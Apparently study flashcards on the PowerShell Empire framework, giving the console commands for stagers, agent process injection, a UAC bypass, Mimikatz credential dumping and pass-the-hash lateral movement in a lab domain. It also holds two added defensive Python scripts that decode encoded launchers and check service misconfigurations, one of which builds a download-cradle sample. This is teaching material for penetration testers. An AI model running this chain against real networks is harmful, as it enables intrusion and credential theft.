PowerShell Empire Flashcards
What is the name of the Github repository of Empire?
PowerShellEmpire
How do you install Empire?
- Clone Github repo
- cd Empire
- sudo ./setup/install.sh
- sudo ./empire
How do you see a list of Empire listeners?
- (Empire) > listeners
- (Empire: listeners) > uselistener
What are the available listeners in Empire?
- dbx
- http = most basic
- http_com
- http_foreign
- http_hop
- http_mapi
- meterpreter
- redirector = creates a pivot that enables communication with an internal network
How do you select the http listener and select a Host listener IP of 10.11.0.4?
- (Empire: listeners) > uselistener http
- (Empire: listeners/http) > set Host 10.11.0.4
- (Empire: listeners/http) > execute
If you are in a selected listener, how to you return to the main Listener Menu?
(Empire: listeners/http) > back
How can you list the available Stagers?
- ** Make sure you are in the Listener main menu **
- (Empire: listeners) > usestager
What are some support examples that Empire Stagers provide?
- DLLs
- HTML applications
- Microsoft Office Macros
How do you select the ‘windows/launcher_bat’ Stager for the HTTP Listener?
- (Empire: listeners) > usestager windows/launcher_bat
- (Empire: stager/windows/launcher_bat) > set Listener http
- (Empire: stager/windows/launcher_bat) > execute
** Here is the output **
[*] Stager output written out to: /tmp/launcher.bat
** The Stager must then be copied to the target and executed **
How can we examine what the ‘windows/launcher_bat’ Stager does?
- kali@kali:/opt/Empire$ cat /tmp/launcher.bat
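The launcher.bat written by the windows/launcher_bat stager is a short batch file that starts a hidden PowerShell with a base64-encoded (UTF-16LE) -enc argument and then deletes itself. The script below is an added example, not code from the page or from the Empire project: it extracts and decodes that argument and records the indicators a defender would look for in the batch file or in a process-creation log line. The sample launcher it parses is constructed here and carries a harmless download-cradle string pointing at the listener IP used on this page; it is not a real Empire stager.

```python
"""Decode and triage an encoded PowerShell launcher (added example)."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG_RE = re.compile(
    r"(?<![\w-])-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE)
SELF_DELETE_RE = re.compile(r'del\s+"?%~f0"?', re.IGNORECASE)

# Strings that typically appear in a download-cradle launcher.
CRADLE_INDICATORS = (
    "net.webclient", "downloadstring", "downloaddata", "iex",
    "invoke-expression", "frombase64string", "servicepointmanager",
)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -enc expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell; raises ValueError on non-base64 input."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def triage_line(line: str) -> dict:
    """Return the indicators found in one batch-file or command-line string."""
    decoded = [decode_powershell(m) for m in ENC_FLAG_RE.findall(line)]
    lowered = " ".join(decoded).lower()
    return {
        "encoded_command": decoded,
        "hidden_window": bool(HIDDEN_RE.search(line)),
        "no_profile": bool(NOPROFILE_RE.search(line)),
        "self_delete": bool(SELF_DELETE_RE.search(line)),
        "cradle_indicators": [i for i in CRADLE_INDICATORS if i in lowered],
    }


def triage_launcher(text: str) -> dict:
    """Merge per-line findings for a whole launcher.bat-style file."""
    merged = {"encoded_command": [], "hidden_window": False,
              "no_profile": False, "self_delete": False,
              "cradle_indicators": []}
    for line in text.splitlines():
        found = triage_line(line)
        merged["encoded_command"] += found["encoded_command"]
        merged["cradle_indicators"] += [i for i in found["cradle_indicators"]
                                        if i not in merged["cradle_indicators"]]
        for key in ("hidden_window", "no_profile", "self_delete"):
            merged[key] = merged[key] or found[key]
    # An encoded command alone is not proof; combine it with a hidden window
    # or a download cradle before calling the file suspicious.
    merged["suspicious"] = bool(merged["encoded_command"]) and (
        merged["hidden_window"] or bool(merged["cradle_indicators"]))
    return merged


# Constructed sample (not a real Empire stager): a download cradle of the
# kind a launcher carries, aimed at the listener IP used on this page.
SAMPLE_CRADLE = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://10.11.0.4/index.asp')")
SAMPLE_LAUNCHER_BAT = (
    "@echo off\r\n"
    f"start /b powershell -noP -sta -w 1 -enc {encode_powershell(SAMPLE_CRADLE)}\r\n"
    'start /b "" cmd /c del "%~f0"&exit /b\r\n'
)

if __name__ == "__main__":
    for key, value in triage_launcher(SAMPLE_LAUNCHER_BAT).items():
        print(f"{key}: {value}")
```

The same triage_line function works on the CommandLine field of a Sysmon event 1 or Windows 4688 record, which is where the launcher's PowerShell invocation is logged on the target; only the self_delete check is specific to the batch file itself.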
What is an Empire ‘Agent’?
- the final payload retrieved by the Stager
- it allows us to execute commands and interact with the system
- the Stager deletes itself and exits once it finishes execution
What happens once the ‘Agent’ is operational on the target?
- the ‘Agent’ will set up an AES-encrypted communication channel with the listener using the data portion of the HTTP GET and POST requests
How do we get the ‘Agent’ operational on the target?
- We copy the Stager output to the target and execute it
- For example, launcher.bat
- C:\Users\Offsec\Documents> launcher.bat
Once the ‘Agent’ is operational, how do we view it in Empire?
(Empire: stager/windows/launcher_bat) > agents
Once the ‘Agent’ is operational, how do we interact with it in Empire?
(Empire: agents) > interact S2Y5XW1L
How do we migrate our payload into a process on the target from the ‘Agent’ interaction in Empire?
- Display processes running on the target
- - (Empire: S2Y5XW1L) > ps
- Inject the payload into the chosen process (in the example, PID 3568 was ‘explorer’)
- - (Empire: S2Y5XW1L) > psinject http 3568
- See that a new Agent is created
- - (Empire: S2Y5XW1L) > agents
- Switch to the new Agent
- - (Empire: agents) > interact DWZ49BAP
** You must switch to the new Agent that is generated after injecting the payload into the running process **
How do you list the available Empire modules?
- (Empire: S2Y5XW1L) > usemodule
Which Empire module category focuses on local client and AD enumeration?
situational_awareness
What is the module path for Powerview?
situational_awareness/network/powerview
How do you display the options of the module?
info
What does it mean if the ‘NeedsAdmin’ field is set to ‘True’?
- the script requires local Administrators permissions
What does it mean if the ‘OpsecSafe’ field is set to ‘True’?
- will avoid leaving behind indicators of compromise, such as temporary disk files or new user accounts
What does the ‘MinLanguageVersion’ field describe?
- the minimum version of PowerShell required to execute the script
- ** Especially relevant with Windows 7 or Windows Server 2008 R2 that ship with PowerShell v.2
What does it mean if the ‘Background’ field is set to ‘True’?
- the module executes in the background w/o visibility for the victim
What does the ‘OutputExtension’ field describe?
- the output file format, if the module returns its output to a file
How would you initiate the ‘get_user’ module?
- (Empire: S2Y5XW1L) > usemodule situational_awareness/network/powerview/get_user
- (Empire: powershell/situational_awareness/network/powerview/get_user) > execute
What Empire module uses several techniques based on misconfigurations such as unquoted service paths and improper permissions on service executables?
How do you initiate it?
- The ‘allchecks’ module within the ‘privesc’ category
- (Empire: powershell/situational_awareness/network/powerview/get_user) > usemodule powershell/privesc/powerup/allchecks
- (Empire: powershell/privesc/powerup/allchecks) > execute
** ‘allchecks’ also tells you whether this user is a local admin **
[*] Checking if user is in a local group with administrative privileges…
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.
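Two of the misconfigurations allchecks looks for, unquoted service paths containing spaces and service binaries the current user can overwrite, come down to simple path logic. The script below is an added example, not Empire or PowerUp code: it models those two checks on constructed ImagePath values and a constructed picture of which directories and files the current user can write. On a real host the ImagePath values would come from `sc qc <service>` or the service's registry key and the write-access answers from the file ACLs; here both are supplied inline so the logic runs offline.

```python
r"""Service-misconfiguration checks of the kind PowerUp's allchecks runs
(added example, not Empire or PowerUp code).

An unquoted ImagePath such as C:\Program Files\Vendor\My App\svc.exe makes
the Service Control Manager try C:\Program.exe, then
C:\Program Files\Vendor\My.exe, before the real binary. Each space in the
directory part therefore yields one path an attacker could plant, and the
finding is exploitable only if the directory holding that path is writable.
A service binary (or its directory) writable by the current user is the
second, simpler, misconfiguration.
"""
import ntpath
import re

# The executable is the part of the ImagePath up to the first ".exe" that is
# followed by whitespace or the end of the string.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


def service_binary(image_path: str) -> str:
    """Return the executable path the SCM will ultimately launch."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return image_path[1:].split('"', 1)[0]
    match = EXE_RE.match(image_path)
    return match.group(1) if match else image_path.split(" ", 1)[0]


def hijack_candidates(image_path: str) -> list[str]:
    """Paths an attacker could plant to be run instead of an unquoted binary.

    A quoted ImagePath yields no candidates; an unquoted one yields one
    candidate per space, in the order the SCM would try them.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    binary = service_binary(image_path)
    return [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]


def check_service(image_path: str, writable_dirs: set, writable_files: set) -> dict:
    """Evaluate one service's ImagePath against the caller's write access."""
    binary = service_binary(image_path)
    candidates = hijack_candidates(image_path)
    plantable = [c for c in candidates if ntpath.dirname(c) in writable_dirs]
    return {
        "binary": binary,
        "unquoted_candidates": candidates,
        "plantable": plantable,
        "binary_writable": (binary in writable_files
                            or ntpath.dirname(binary) in writable_dirs),
    }


def all_checks(services: dict, writable_dirs: set, writable_files: set) -> dict:
    """Run check_service over every service and keep only actual findings."""
    findings = {}
    for name, image_path in services.items():
        result = check_service(image_path, writable_dirs, writable_files)
        if result["plantable"] or result["binary_writable"]:
            findings[name] = result
    return findings


# Constructed sample ImagePath values and a constructed view of what the
# current user can write; none of this comes from a real host.
SAMPLE_SERVICES = {
    "GoodSvc": '"C:\\Program Files\\Vendor\\Good App\\good.exe" -service',
    "UnquotedSvc": "C:\\Program Files\\Vendor\\Unquoted App\\svc.exe --port 8080",
    "WritableBin": "C:\\Tools\\Agent\\agent.exe",
    "NetSvcs": "C:\\Windows\\system32\\svchost.exe -k netsvcs",
}
WRITABLE_DIRS = {"C:\\Program Files\\Vendor", "C:\\Tools\\Agent"}
WRITABLE_FILES = {"C:\\Tools\\Agent\\agent.exe"}

if __name__ == "__main__":
    for name, finding in all_checks(SAMPLE_SERVICES, WRITABLE_DIRS,
                                    WRITABLE_FILES).items():
        print(name, finding)
```

Note that NetSvcs is unquoted but not flagged: svchost.exe has no space in its path, so there is nothing to hijack, which is why allchecks-style tools report unquoted paths only when a space appears before the executable name and the prefix directory is writable.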
Which Empire module can bypass UAC and launch a high-integrity PowerShell Empire agent?
What is required to use this?
How do you launch it?
- bypassuac_fodhelper module in the ‘privesc’ category
- requires access to a local administrator account
- (Empire: S2Y5XW1L) > usemodule privesc/bypassuac_fodhelper
- Then need to set the ‘http’ Listener
- (Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http
- Finally, execute the module
- (Empire: powershell/privesc/bypassuac_fodhelper) > execute
Which module category are the Mimikatz modules located?
- credentials
What do the asterisks next to Mimikatz modules mean?
- they require a high-integrity Empire agent
How does Empire load Mimikatz libraries into the agent?
Why does this help prevent detection?
- Empire uses reflective DLL injection to load the Mimikatz library into the agent directly from memory
- Loading code this way reduces the risk of detection, since many antivirus and EDR products primarily analyze files written to disk
What module allows you to get the passwords of logged-on users, and which Mimikatz command does it run?
- credentials/mimikatz/logonpasswords
- mimikatz(powershell) # sekurlsa::logonpasswords
- To get the credentials that are written to the credential store, use ‘creds’
- (Empire: K678VC13) > creds
Once we have user credentials, what is our goal?
- lateral movement
- logon to additional systems until we reach our objective
How can you use ‘lateral_movement’ module category to get a System shell?
- We can use the ‘lateral_movement/invoke_smbexec’ module, with the following parameters:
- ComputerName = hostname of the Windows 10 client
- Listener = http
- Username = ‘jeff_admin’
- Domain = ‘corp.com’
- Hash = the ‘jeff_admin’ hash obtained from Mimikatz ‘logonpasswords’ module
- (Empire: K678VC13) > usemodule lateral_movement/invoke_smbexec
- (Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName client251
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Username jeff_admin
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Hash e2b475c11da2a0748290d8
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Domain corp.com
- (Empire: powershell/lateral_movement/invoke_smbexec) > execute
- A new Agent from the target system then appears in the agents list; switch to it
- (Empire: powershell/lateral_movement/invoke_smbexec) > agents
- (Empire: agents) > interact UXVZ2NC3